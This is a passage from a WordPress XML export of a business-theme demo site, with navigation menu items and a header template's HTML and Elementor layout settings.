		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2118</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[2118]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>22</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[2122]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[977]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/2119/</link>
		<pubDate>Fri, 13 Nov 2020 07:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/2020/11/13/2119/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2119</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[2119]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>21</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[2122]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[959]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/2120/</link>
		<pubDate>Fri, 13 Nov 2020 07:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/2020/11/13/2120/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2120</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[2120]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>20</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[2122]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[898]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Our Services 2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-services-2/</link>
		<pubDate>Fri, 13 Nov 2020 07:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/2020/11/13/our-services-2/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2121</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-services-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>5</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[2102]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[885]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Services</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/services/</link>
		<pubDate>Fri, 13 Nov 2020 07:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/2020/11/13/services/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2122</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[services]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>19</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[868]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/2123/</link>
		<pubDate>Fri, 13 Nov 2020 07:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/2020/11/13/2123/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2123</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[2123]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>17</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[2124]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[861]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Portfolio</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/portfolio/</link>
		<pubDate>Fri, 13 Nov 2020 07:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/2020/11/13/portfolio/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2124</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>14</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[847]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/2125/</link>
		<pubDate>Fri, 13 Nov 2020 07:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/2020/11/13/2125/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2125</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[2125]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>16</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[2124]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[858]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header 1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/ot_header_builders/header-1/</link>
		<pubDate>Fri, 17 Jul 2020 08:34:51 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=7</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz/">
					<img src="https://maxbizz.s3.amazonaws.com/images/01_Black.svg" alt="Maxbizz">
				</a>			        
				<a href="tel:+1-800-456-478-23">
				

	
		
	

				</a>
				<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a>
				</h6>
								<p>+1-800-456-478-23</p>
				

	
		
	

				
				<h6>
					Visit Us Daily
				</h6>
								<p>411 University St, Seattle</p>
			<a href="#" role="button">
						FREE QUOTE
					</a>
						<nav id="site-navigation">			
				<ul id="primary-menu"><li id="menu-item-361"><a href="http://wpdemo.archiwp.com/maxbizz/">Home</a></li>
<li id="menu-item-363"><a href="#">Pages</a>
<ul>
	<li id="menu-item-759"><a href="http://wpdemo.archiwp.com/maxbizz/about-us/">About Us</a></li>
	<li id="menu-item-1043"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/">Our Services 1</a></li>
	<li id="menu-item-1021"><a href="http://wpdemo.archiwp.com/maxbizz/services-with-icon/">Our Services 2</a></li>
	<li id="menu-item-764"><a href="http://wpdemo.archiwp.com/maxbizz/our-core-values/">Our Core Values</a></li>
	<li id="menu-item-765"><a href="http://wpdemo.archiwp.com/maxbizz/our-team/">Our Team</a></li>
	<li id="menu-item-766"><a href="http://wpdemo.archiwp.com/maxbizz/our-team/single-team/">Single Team</a></li>
	<li id="menu-item-762"><a href="http://wpdemo.archiwp.com/maxbizz/elements/">Elements</a></li>
	<li id="menu-item-767"><a href="http://wpdemo.archiwp.com/maxbizz/typography/">Typography</a></li>
	<li id="menu-item-763"><a href="http://wpdemo.archiwp.com/maxbizz/faqs/">FAQs</a></li>
	<li id="menu-item-758"><a href="http://wpdemo.archiwp.com/maxbizz/404-2/">404</a></li>
	<li id="menu-item-760"><a href="http://wpdemo.archiwp.com/maxbizz/coming-soon/">Coming Soon</a></li>
</ul>
</li>
<li id="menu-item-1041"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-grid/">Portfolio</a>
<ul>
	<li id="menu-item-1044"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-grid/">Portfolio Grid</a></li>
	<li id="menu-item-1042"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-masonry/">Portfolio Masonry</a></li>
	<li id="menu-item-1040"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-carousel/">Portfolio Carousel</a></li>
	<li id="menu-item-1149"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/digital-marketing/">Portfolio Details</a></li>
</ul>
</li>
<li id="menu-item-1022"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/">Services</a>
<ul>
	<li id="menu-item-1020"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/">Marketing Research</a></li>
	<li id="menu-item-1019"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Organizational Audit</a></li>
	<li id="menu-item-1018"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></li>
	<li id="menu-item-1017"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></li>
	<li id="menu-item-1016"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">Support Function</a></li>
	<li id="menu-item-1015"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">Finance Planning</a></li>
</ul>
</li>
<li id="menu-item-771"><a href="http://wpdemo.archiwp.com/maxbizz/blog/">Blog</a>
<ul>
	<li id="menu-item-1045"><a href="http://wpdemo.archiwp.com/maxbizz/blog/">Blog List</a></li>
	<li id="menu-item-1068"><a href="http://wpdemo.archiwp.com/maxbizz/the-future-of-retail-asias-ecosystems/">Blog Post</a></li>
</ul>
</li>
<li id="menu-item-761"><a href="http://wpdemo.archiwp.com/maxbizz/contacts/">Contacts</a></li>
</ul>			</nav>
				<a href="http://wpdemo.archiwp.com/maxbizz/cart/" title="View your shopping cart"> 0
				</a>
				<!-- Form Search on Header -->
						
    <label>Search for:
    </label>
	<button type="submit"></button>
    ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>7</wp:post_id>
		<wp:post_date><![CDATA[2020-07-17 08:34:51]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-17 08:34:51]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-1]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.11]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"8d39a3f","elType":"section","settings":{"content_position":"middle","structure":"20","padding":{"unit":"px","top":"13","right":"0","bottom":"13","left":"0","isLinked":false}},"elements":[{"id":"88d13f7","elType":"column","settings":{"_column_size":50,"_inline_size":25},"elements":[{"id":"fd8c778","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01_Black.svg","id":334},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"f0b1296","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_ot_content_align":"horizontal","align":"flex-end"},"elements":[{"id":"bbce169","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":24,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":3,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#1B1D21","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"0","isLinked":false},"title_typography_line_height":{"unit":"em","size":1.399999999999999911182158029987476766109466552734375,"sizes":[]},"link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"},{"id":"dfefc95","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":24,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":3,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#1B1D21","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"60","isLinked":false},"title_typography_line_height":{"unit":"em","size":1.399999999999999911182158029987476766109466552734375,"sizes":[]}},"elements":[],"widgetType":"icon-box"},{"id":"481a8d7","elType":"widget","settings":{"text":"FREE QUOTE","typography_typography":"custom","typography_font_weight":"600","button_text_color":"#1B1D21","background_color":"rgba(255, 143, 62, 